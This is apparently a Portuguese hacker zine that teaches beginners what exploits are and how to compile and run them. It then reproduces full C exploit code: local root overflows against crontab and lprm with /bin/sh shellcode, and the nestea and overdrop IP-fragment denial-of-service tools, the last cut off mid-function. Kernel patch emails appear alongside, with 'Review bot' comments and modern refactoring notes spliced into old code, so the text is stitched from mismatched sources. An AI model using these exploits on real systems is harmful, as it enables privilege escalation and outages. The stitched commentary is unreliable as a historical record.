<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>
                                                                
                    1***********   Xploit[]'s   ***********1

           1-INTRODUÇÃO :

           Recentemente ainda há uma grande dúvida sobre os tão falados
           exploits.
           Muita gente ainda não sabe direito o que são, o que fazem, como
           usar e por que são tão procurados.
           Então neste texto vamos tentar tirar essas dúvidas.

           2-O que é um exploit :

           Simplificando a explicação, um exploit é um programa que "explora"
           um bug em um software específico. Todos os exploits são diferentes:
           eles fazem coisas diferentes e exploram bugs diferentes nos
           sistemas. Por isso um exploit é sempre um programa específico,
           preso a uma versão do software e, muitas vezes, do sistema.
           Os mais procurados foram feitos pra te dar acesso root: eles
           conseguem isso explorando um bug em um programa que está rodando
           com privilégios de root (um daemon ou um binário privilegiado,
           como o crontab e o lprm dos exemplos abaixo). Nem todo exploit dá
           root, porém: os dois últimos deste texto (nestea e overdrop) só
           derrubam ou atrapalham a máquina alvo (DoS), sem dar acesso nenhum.

           3-Como eu uso um exploit :

           Como os exploits são escritos em C em 99% das vezes, você vai
           precisar de uma shell na máquina em que for usar o exploit, ou
           precisa estar usando o mesmo sistema operacional (e a mesma
           arquitetura, já que o shellcode é código de máquina) da máquina
           que está tentando invadir. Então, basicamente, você precisa
           colocar o código-fonte ou o binário no diretório da sua conta
           nessa shell. Pra isso você pode entrar via ftp e fazer o upload,
           ou usar rz se estiver numa shell dial-up.

           Já que agora você tem o exploit na máquina, só precisa compilar!
           Normalmente se compila o exploit assim:
           
           blah:~/$gcc exploit.c

           Isso deve compilar seu exploit (o binário sai como a.out; use
           "gcc -o exploit exploit.c" pra dar um nome). De qualquer forma,
           fique atento, porque alguns exploits publicados são sacanagem,
           feitos pra pegar quem não manja de C: leia o código inteiro antes
           de compilar, principalmente os bytes do shellcode e qualquer
           chamada que não tenha nada a ver com o bug (system(), remoção de
           arquivos, conexões de rede pra fora).
           Depois de compilar, o exploit está pronto. Rode-o e seu trabalho
           estará feito!

           4-Onde posso pegar exploits :

           Dois sites bem legais são esses :

           http://get.your.exploits.com

           http://www.rootshell.com

           Bom, acho que já falei o básico dos exploits. Pelo menos vocês já
           têm uma noçãozinha do que são e do que fazem essas maravilhas.
           Espero que tenhamos esclarecido algumas dúvidas.

           Agora mais exploit[]'Z

           Exploit do overflow no crontab do LINUX BY Dave G.

-------------------------------Corta

/*
 *
 * Dave G.
 * <daveg@escape.com>
 * http://www.escape.com/~daveg
 *
 *
 */

#include <sys/types.h>

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET          -1240
#define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE              "./Window"

/*
 * Return the current stack pointer.
 *
 * The inline asm copies %esp into %eax and the function then falls off
 * the end without a return statement, so the caller receives whatever
 * is left in %eax under the i386 calling convention.  This works only
 * on 32-bit x86 and only while the compiler emits nothing that clobbers
 * %eax between the asm and the epilogue; as far as the C standard is
 * concerned it is undefined behaviour.  main() adds its offset to this
 * value to form the return addresses it writes into the payload.
 */
long get_esp(void)
{
   __asm__("movl %esp,%eax\n");   /* result deliberately left in %eax */
}

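/*
 * Build the overflow input for /usr/bin/crontab and hand it over.
 *
 * HAPPY_FILE is laid out as
 *   [NOP sled][execshell][878 bytes of return address][=X\n]
 * where the first BUFFER_SIZE bytes are sled + shellcode (BUFFER_SIZE
 * mirrors crontab's MAX_TEMPSTR, see the define) and every 4-byte slot
 * after them holds get_esp() + ofs.  Per the original author's note,
 * crontab's sscanf reads the name with %[^ =], so no space or '=' may
 * appear in the payload before the trailing "=X".
 *
 * argv[1], if present, overrides the stack offset (DEFAULT_OFFSET).
 * More than one argument prints a usage line and exits with status 255,
 * as before.
 *
 * 32-bit x86 only: the return-address slots are written through an
 * unsigned long *, which is 4 bytes wide on i386 but 8 on LP64, and the
 * shellcode is i386 machine code.
 *
 * Changes from the original: main() has a return type; open(), write(),
 * close() and execl() failures are reported instead of ignored, and a
 * failed malloc() exits non-zero; the file is opened with O_TRUNC so a
 * longer stale ./Window does not leave old bytes after the payload; the
 * payload length is taken from the write cursor rather than strlen() (a
 * NUL byte inside a return address would otherwise truncate the file);
 * the diagnostic prints the long with %lx.
 */
int main(int argc, char **argv)
{
   /* number of return-address bytes appended after the shellcode */
   enum { ADDR_BYTES = 878 };

   u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
   /* sizeof - 1 drops the terminating NUL; the shellcode has no NUL inside */
   const size_t shell_len = sizeof execshell - 1;
   int ofs = DEFAULT_OFFSET;

   /* optional single argument: offset to add to esp */
   if (argc == 2) {
      ofs = atoi(argv[1]);
   } else if (argc > 2) {
      fprintf(stderr, "egg [offset]\n");
      exit(-1);
   }

   /* the sled length below is BUFFER_SIZE - shell_len; keep it non-negative */
   if (shell_len > BUFFER_SIZE) {
      fprintf(stderr, "shellcode longer than BUFFER_SIZE\n");
      exit(1);
   }

   /* one guess of where the payload will sit on crontab's stack */
   unsigned long target = get_esp() + ofs;
   printf("Using offset of esp + %d (%lx)\n", ofs, target);

   char *buff = malloc(4096);
   if (!buff) {
      printf("can't allocate memory\n");
      exit(1);
   }
   char *ptr = buff;

   /* NOP sled up to the shellcode, then the shellcode itself */
   memset(ptr, 0x90, BUFFER_SIZE - shell_len);
   ptr += BUFFER_SIZE - shell_len;
   memcpy(ptr, execshell, shell_len);
   ptr += shell_len;

   /* ADDR_BYTES / 4 copies of the guessed return address */
   unsigned long *addr_ptr = (unsigned long *)ptr;
   for (int i = 0; i < ADDR_BYTES / 4; i++)
      *(addr_ptr++) = target;
   ptr = (char *)addr_ptr;

   /* '=' ends the name crontab scans with %[^ =]; "X\n" finishes the line */
   *ptr++ = '=';
   *ptr++ = 'X';
   *ptr++ = '\n';
   *ptr = 0;

   const size_t payload_len = (size_t)(ptr - buff);
   printf("Writing to %s\n", HAPPY_FILE);

   int fd = open(HAPPY_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0666);
   if (fd < 0) {
      perror(HAPPY_FILE);
      free(buff);
      exit(1);
   }
   ssize_t n = write(fd, buff, payload_len);
   if (n < 0 || (size_t)n != payload_len) {
      perror("write");
      close(fd);
      free(buff);
      exit(1);
   }
   if (close(fd) < 0) {
      perror("close");
      free(buff);
      exit(1);
   }
   free(buff);

   execl("/usr/bin/crontab", "crontab", HAPPY_FILE, NULL);
   /* execl only returns on failure */
   perror("execl");
   return 1;
}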

-----------------------------------Corta

------------------------------------------------------------------------------

           Outro clássico overflow em Linux 4.2 BY Chris Evans

-------------------------------------Corta

/* lprm.c
*
* 
*
* Exploit bug descoberto por Chris Evans no Linux lprm.
*/

#include <stdio.h>
#define PRINTER "-Pwhatever"


/*
 * Return the current stack pointer (32-bit x86 only).
 *
 * Implicit-int function with no return statement: the asm leaves %esp
 * in %eax and the caller picks the value up from there.  Correct only on
 * i386 and only while the compiler emits nothing that clobbers %eax
 * between the asm and the epilogue; undefined behaviour by the C
 * standard.  main() adds its offset to this value to form the return
 * address it appends to the argument.
 */
static inline getesp() {
  __asm__(" movl %esp,%eax ");   /* value returned via %eax */
}

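/*
 * Overflow the argument handed to /usr/bin/lprm.
 *
 * argv passed to lprm is: "lprm" PRINTER buf, where buf is
 *   [sled bytes of 0x41][shellcode][esp+offset, little-endian, twice]
 * i.e. a sled of 'A's (0x41 is "inc %ecx" on i386, so the sled executes
 * harmlessly if control lands in it), the shellcode, and two copies of
 * the guessed return address getesp() + offset.
 *
 * argv[1] overrides the sled length (default 990), argv[2] the stack
 * offset (default 3000).
 *
 * Changes from the original: the sled length is range-checked so that
 * sled + shellcode + 8 address bytes + NUL fit in the 4096-byte buf (the
 * original trusted argv[1] and wrote past buf, or at a negative index,
 * for out-of-range values); buf is NUL-terminated after the addresses
 * (the original left the tail uninitialized, so execl passed whatever
 * garbage followed); the esp value prints with %lx; execl failure is
 * reported; main returns an int.
 *
 * 32-bit x86 only: the shellcode and the esp-derived address are i386.
 */
int main(int argc, char **argv) {
  unsigned char buf[4096];
  unsigned char shellcode[] =
    "\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c"
    "\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh";
  const size_t shell_len = sizeof shellcode - 1;   /* no NUL inside */
  const size_t max_sled = sizeof buf - shell_len - 9;   /* 2*4 addr + NUL */
  int sled = 990;
  int offset = 3000;
  size_t pos;

  if (argc > 1) sled = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  /* everything after the sled needs shell_len + 9 bytes of room */
  if (sled < 0 || (size_t)sled > max_sled) {
    fprintf(stderr, "buffer size must be between 0 and %zu\n", max_sled);
    return 1;
  }

  for (int i = 0; i < sled; i++)
    buf[i] = 0x41;                                 /* inc %ecx */
  pos = (size_t)sled;
  for (size_t i = 0; i < shell_len; i++)
    buf[pos++] = shellcode[i];

  unsigned long esp = getesp() + offset;

  /* two little-endian copies of the guessed return address */
  for (int copy = 0; copy < 2; copy++) {
    buf[pos++] = esp & 0xFF;
    buf[pos++] = (esp >> 8) & 0xFF;
    buf[pos++] = (esp >> 16) & 0xFF;
    buf[pos++] = (esp >> 24) & 0xFF;
  }
  buf[pos] = 0;   /* argv strings end at the first NUL */

  printf("Offset: 0x%lx\n\n", esp);

  execl("/usr/bin/lprm", "lprm", PRINTER, (char *)buf, NULL);
  perror("execl");   /* only reached if the exec failed */
  return 1;
}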

----------------------------------------------------Corta

------------------------------------------------------------------------------

           Bug do IP em Linux 2.0.33 BY Alan Cox

-------------------------------------------------Corta

Date:         Thu, 16 Apr 1998 15:09:56 +0100
Reply-To:     Alan Cox <alan@CYMRU.NET>
Subject:      Linux 2.0.33 vulnerability: fragment patterns

Ok duplicated. There's an 'off by one IP header' bug

--- ip_fragment.c.old   Thu Apr 16 12:25:34 1998
+++ ip_fragment.c       Thu Apr 16 12:29:02 1998
@@ -375,7 +375,7 @@
        fp = qp->fragments;
        while(fp != NULL)
        {
-               if (fp->len < 0 || count+fp->len > skb->len)
+               if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)
                {
                        NETDEBUG(printk("Invalid fragment list: Fragment over size.\n"));
                        ip_free(qp);
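Review bot: The new bound compares each fragment's end, `fp->offset + qp->ihlen + fp->len`, against `skb->len`, but nothing in the hunk shows where `fp->offset` and `qp->ihlen` were validated when the fragment was queued, so the check is only as good as that earlier code; the loop and the function containing it start and end outside the hunk. Of the three terms only `fp->len` is sign-checked here, so if `offset` can be negative on this kernel a self-contained guard would be `if (fp->offset < 0 || fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)`, which is worth confirming against the struct definition. The nestea listing later in this zine claims to trigger this same bug, so its three fragments would make a natural regression test for the patch.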


------------------------------------------------------------------

//
// 
//

// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.*  and some windows boxes
// this code is a total rip of teardrop - it's messy
// hi sygma

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

// bsd usage is currently broken because of socket options on the third sendto

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256    /* datagram frame padding for first packet */
#define COUNT   500    /* we are overwriting a small number of bytes we 
			shouldnt have access to in the kernel. 
			to be safe, we should hit them till they die :>  */

void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

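/*
 * nestea entry point: "src_ip dst_ip [-s src_prt] [-t dst_prt]
 * [-n how_many]".  Opens a raw IP socket with IP_HDRINCL and calls
 * send_frags() `count` times with a 500 us pause between rounds.
 *
 * Defaults: a random port for -s/-t when absent or 0, COUNT rounds when
 * -n is absent or 0.  Both addresses go through name_resolve(); a failed
 * resolution is fatal.
 *
 * Changes from the original: the argument-count check and option parsing
 * run before the raw socket is opened, so a usage error no longer needs
 * root to be reported; the positional addresses are read from
 * argv[optind] after getopt, so options may precede them; -s/-t are
 * range-checked (1..65535) and -n must not be negative, where the
 * original silently truncated to u_short or looped zero times; getopt
 * is compared with -1 rather than EOF; the socket is closed on exit.
 */
int main(int argc, char **argv)
{
    int one = 1, count = 0, opt, round, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    long val;
    char *end;
    struct in_addr addr;

    if (argc < 3) usage((u_char *)argv[0]);

    while ((opt = getopt(argc, argv, "s:t:n:")) != -1)
    {
        switch (opt)
        {
            case 's':               /* source port (should be ephemeral) */
            case 't':               /* dest port (DNS, anyone?) */
                val = strtol(optarg, &end, 10);
                if (*optarg == '\0' || *end != '\0' || val < 1 || val > 0xffff)
                {
                    fprintf(stderr, "port must be 1..65535: %s\n", optarg);
                    exit(1);
                }
                if (opt == 's') src_prt = (u_short)val;
                else            dst_prt = (u_short)val;
                break;
            case 'n':               /* number of rounds to send */
                val = strtol(optarg, &end, 10);
                if (*optarg == '\0' || *end != '\0' || val < 0 ||
                    (long)(int)val != val)
                {
                    fprintf(stderr, "-n needs a non-negative number: %s\n",
                            optarg);
                    exit(1);
                }
                count = (int)val;
                break;
            default :
                usage((u_char *)argv[0]);
                break;              /* NOTREACHED */
        }
    }

    /* the two positional addresses follow whatever options getopt consumed */
    if (argc - optind < 2) usage((u_char *)argv[0]);
    if (!(src_ip = name_resolve((u_char *)argv[optind])) ||
        !(dst_ip = name_resolve((u_char *)argv[optind + 1])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    /* we supply the IP header ourselves */
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }

    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n");
    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (round = 0; round < count; round++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    close(rip_sock);
    return (0);
}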

/*
 * Send one round of three UDP-over-IP fragments from src to dst, all
 * with IP id 242, TTL 0x40 and the given ports.  main() set IP_HDRINCL
 * on the socket, so the headers built here go out as written (the IP
 * checksum is left 0 for the kernel, see the inline comments).
 *
 *   1. 20-byte header, MF set, offset 0, 10 bytes of UDP payload
 *      (UDP length field 18).
 *   2. 20-byte header, MF clear, fragment offset field 6 (48 bytes into
 *      the datagram), MAGIC2 (108) bytes of UDP payload.
 *   3. version/IHL byte 0x4F, i.e. a 60-byte IP header; the total-length
 *      field declares IPH+UDPH+PADDING+40 bytes but only IPH+UDPH+PADDING
 *      are sent; MF set, offset 0; the UDP header is placed at byte 60
 *      (after the 44 bytes skipped past the destination address) and
 *      followed by pseudo-random bytes.
 *
 * According to the header comment this geometry triggers the "off by one
 * ip header" reassembly bug; which of the details above is essential is
 * not established by this file.
 *
 * Review notes (behaviour deliberately left as-is):
 *  - sin.sin_port is stored without htons(); with IP_HDRINCL the kernel
 *    presumably takes everything from the supplied header — TODO confirm.
 *  - src_ip/dst_ip are stored through u_long *, i.e. sizeof(u_long)
 *    bytes: 4 on ILP32 but 8 on LP64, where each store spills 4 bytes
 *    past its field.  On little-endian LP64 the spill happens to be
 *    overwritten by the stores that follow, but that is luck, not
 *    design; rebuild as 32-bit or switch to a 4-byte type if revived.
 *  - "*((u_short *)p_ptr) = 0x40" writes the TTL with a 16-bit store:
 *    on a little-endian host TTL becomes 0x40 and protocol 0 (then set
 *    to IPPROTO_UDP by the memcpy); on big-endian the TTL byte would be 0.
 *  - the random-fill loop increments i in both the header and the body,
 *    so only every other byte of the tail is randomised, and p_ptr[0]
 *    (first byte of the UDP length just written) is among them.
 *  - malloc() is unchecked, and the first two bzero() calls clear 40
 *    bytes fewer than were allocated.
 */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;          /* host order, see note above */
    sin.sin_addr.s_addr = dst_ip;

    /* one buffer reused for all three fragments; sized for the third */
    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    /* --- fragment 1: first 10 bytes of UDP payload, more to follow --- */
    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL (16-bit store, see note) */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* --- fragment 2: offset 6 (48 bytes), MF clear, MAGIC2 bytes --- */
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* --- fragment 3: 60-byte IP header (IHL 15), MF set, offset 0 --- */
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    byte = 0x4F;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40);    /* total length (40 more than is sent) */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 44;                        /* skip the 40-byte option area: UDP header lands at byte 60 */
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

	/* fills every other byte from the UDP length field onward (i is incremented twice) */
	for(i=0;i<PADDING;i++)
	{
		p_ptr[i++]=random()%255;
	}	

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}

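/*
 * Resolve a dotted-quad or host name to an IPv4 address in network byte
 * order, returned as the u_long the callers store into sin_addr and the
 * IP header.  Returns 0 on failure (which is also what "0.0.0.0" maps
 * to, as in the original).
 *
 * Changes from the original: inet_addr() failure is detected with
 * INADDR_NONE instead of comparing an unsigned value with -1, and the
 * gethostbyname() result is copied only when it is an AF_INET address
 * of the expected length (the original bcopy()'d h_length bytes into a
 * 4-byte field, whatever h_length was).
 */
u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;
    const char *name = (const char *)host_name;

    addr.s_addr = inet_addr(name);
    if (addr.s_addr == INADDR_NONE)
    {
        /* not a dotted quad: fall back to the resolver */
        host_ent = gethostbyname(name);
        if (!host_ent || host_ent->h_addrtype != AF_INET ||
            host_ent->h_length != (int)sizeof addr.s_addr ||
            !host_ent->h_addr_list[0])
            return (0);
        memcpy(&addr.s_addr, host_ent->h_addr_list[0], sizeof addr.s_addr);
    }
    return (addr.s_addr);
}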

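/*
 * Print the command synopsis to stderr and terminate.  main() calls this
 * when the positional arguments are missing or an option is unknown.
 *
 * Changed from the original to exit with status 1: it used to exit 0,
 * so a caller could not tell a usage error from a successful run.
 */
void usage(u_char *name)
{
    fprintf(stderr,
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
            name);
    exit(1);
}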

-----------------------------------------------Corta

------------------------------------------------------------------------------

          Overdrop em Linux 2.0.33 BY Michal Zalewski

----------------------------------------------------------Corta

From lcamtuf@boss.staszic.waw.pl Sat Apr 18 09:06:58 1998
Date: Sat, 18 Apr 1998 11:48:33 +0200 (CEST)
From: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
Subject: ip_fragment.c - printk() problem.

Here's a DoS exploit against Linux 2.0.33... It doesn't crash
anything, but it's very annoying ;)

Fix:

--- ip_fragment.c.orig  Fri Apr 17 16:42:38 1998
+++ ip_fragment.c       Fri Apr 17 17:17:15 1998
@@ -345,7 +345,7 @@

        if(len>65535)
        {
-               printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+               NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
                ip_statistics.IpReasmFails++;
                ip_free(qp);
                return NULL;
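Review bot: Wrapping the printk() in NETDEBUG removes the per-packet log line entirely on non-debug builds, so the only operator-visible trace of an oversized-reassembly flood is the `ip_statistics.IpReasmFails++` counter on the next line; if the message is wanted at all, a rate-limited or once-per-source variant would keep the diagnostic without reopening the log flood that the overdrop listing below abuses. The enclosing function starts and ends outside the hunk, so how `len` was computed cannot be checked from this view.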

-------------------------------------------------------------------------

// 

// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#define IP_MF	0x2000
#define IPH	0x14
#define UDPH	0x8
#define PADDING	0x1c
#define MAGIC	0x3
#define COUNT	0xBEEF
#define FRAG2	0xFFFF

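/*
 * Print the command synopsis to stderr and terminate.  main() calls this
 * when the destination is missing or an option is unknown.
 *
 * Changed from the original to exit with status 1: it used to exit 0,
 * so a caller could not tell a usage error from a successful run.
 */
void usage(char *name) {
  fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);
  exit(1);
}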

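/*
 * Resolve a dotted-quad or host name to an IPv4 address in network byte
 * order, returned as the u_long the callers store into sin_addr and the
 * IP header.  Returns 0 on failure (which is also what "0.0.0.0" maps
 * to, as in the original).
 *
 * Changes from the original: inet_addr() failure is detected with
 * INADDR_NONE instead of comparing an unsigned value with -1, and the
 * gethostbyname() result is copied only when it is an AF_INET address
 * of the expected length (the original bcopy()'d h_length bytes into a
 * 4-byte field, whatever h_length was).
 */
u_long name_resolve(char *host_name) {
  struct in_addr addr;
  struct hostent *host_ent;

  addr.s_addr = inet_addr(host_name);
  if (addr.s_addr == INADDR_NONE) {
    /* not a dotted quad: fall back to the resolver */
    host_ent = gethostbyname(host_name);
    if (!host_ent || host_ent->h_addrtype != AF_INET ||
        host_ent->h_length != (int)sizeof addr.s_addr ||
        !host_ent->h_addr_list[0])
      return (0);
    memcpy(&addr.s_addr, host_ent->h_addr_list[0], sizeof addr.s_addr);
  }
  return (addr.s_addr);
}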


/*
 * Send one round of two fragments from src to dst, both with IP id 242,
 * TTL 0x40 and the given ports.  main() set IP_HDRINCL on the socket,
 * so the header built here goes out as written (IP checksum left 0 for
 * the kernel).
 *
 *   1. 20-byte header, MF set, offset 0, total length IPH+UDPH+PADDING
 *      (56), UDP length 8+PADDING.
 *   2. The same buffer with two fields patched: total length becomes
 *      IPH+MAGIC+1 (24) and the flags/offset field becomes FRAG2 (0xFFFF,
 *      i.e. every flag bit plus the maximum fragment offset, 8191*8
 *      bytes).  Only 24 bytes are sent: the IP header and the first four
 *      bytes of the UDP header.
 *
 * Per the listing title and the patch above, the second fragment makes
 * the 2.0.33 kernel printk() an "Oversized IP packet" message; this file
 * does not show the kernel arithmetic that gets there.
 *
 * Review notes (behaviour deliberately left as-is):
 *  - sin.sin_port is stored without htons(); with IP_HDRINCL the kernel
 *    presumably takes everything from the supplied header — TODO confirm.
 *  - src_ip/dst_ip are stored through u_long *, i.e. sizeof(u_long)
 *    bytes: 4 on ILP32 but 8 on LP64, where each store spills past its
 *    field and relies on the following stores to repair the damage.
 *  - "*((u_short *)p_ptr)=0x40" writes the TTL with a 16-bit store: on a
 *    little-endian host TTL becomes 0x40 and protocol 0 (then set to
 *    IPPROTO_UDP by the memcpy); on big-endian the TTL byte would be 0.
 *  - malloc() is unchecked.
 */
void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
  u_char *packet=NULL,*p_ptr=NULL;
  u_char byte;
  struct sockaddr_in sin;
  sin.sin_family=AF_INET;
  sin.sin_port=src_prt;                 /* host order, see note above */
  sin.sin_addr.s_addr=dst_ip;
  packet=(u_char *)malloc(IPH+UDPH+PADDING);
  p_ptr=packet;
  bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
  /* --- fragment 1: full header, MF set, offset 0 --- */
  byte=0x45;                            /* IP version 4, IHL 5 */
  memcpy(p_ptr,&byte,sizeof(u_char));
  p_ptr+=2;                             /* skip TOS */
  *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);   /* total length */
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(242);       /* IP id */
  p_ptr+=2;
  *((u_short *)p_ptr)|=htons(IP_MF);    /* flags/offset: MF, offset 0 */
  p_ptr+=2;
  *((u_short *)p_ptr)=0x40;             /* TTL (16-bit store, see note) */
  byte=IPPROTO_UDP;
  memcpy(p_ptr+1,&byte,sizeof(u_char)); /* protocol */
  p_ptr+=4;                             /* checksum left for the kernel */
  *((u_long *)p_ptr)=src_ip;
  p_ptr+=4;
  *((u_long *)p_ptr)=dst_ip;
  p_ptr+=4;
  *((u_short *)p_ptr)=htons(src_prt);   /* UDP source port */
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(dst_prt);   /* UDP destination port */
  p_ptr+=2;
  *((u_short *)p_ptr)=htons(8+PADDING); /* UDP length */
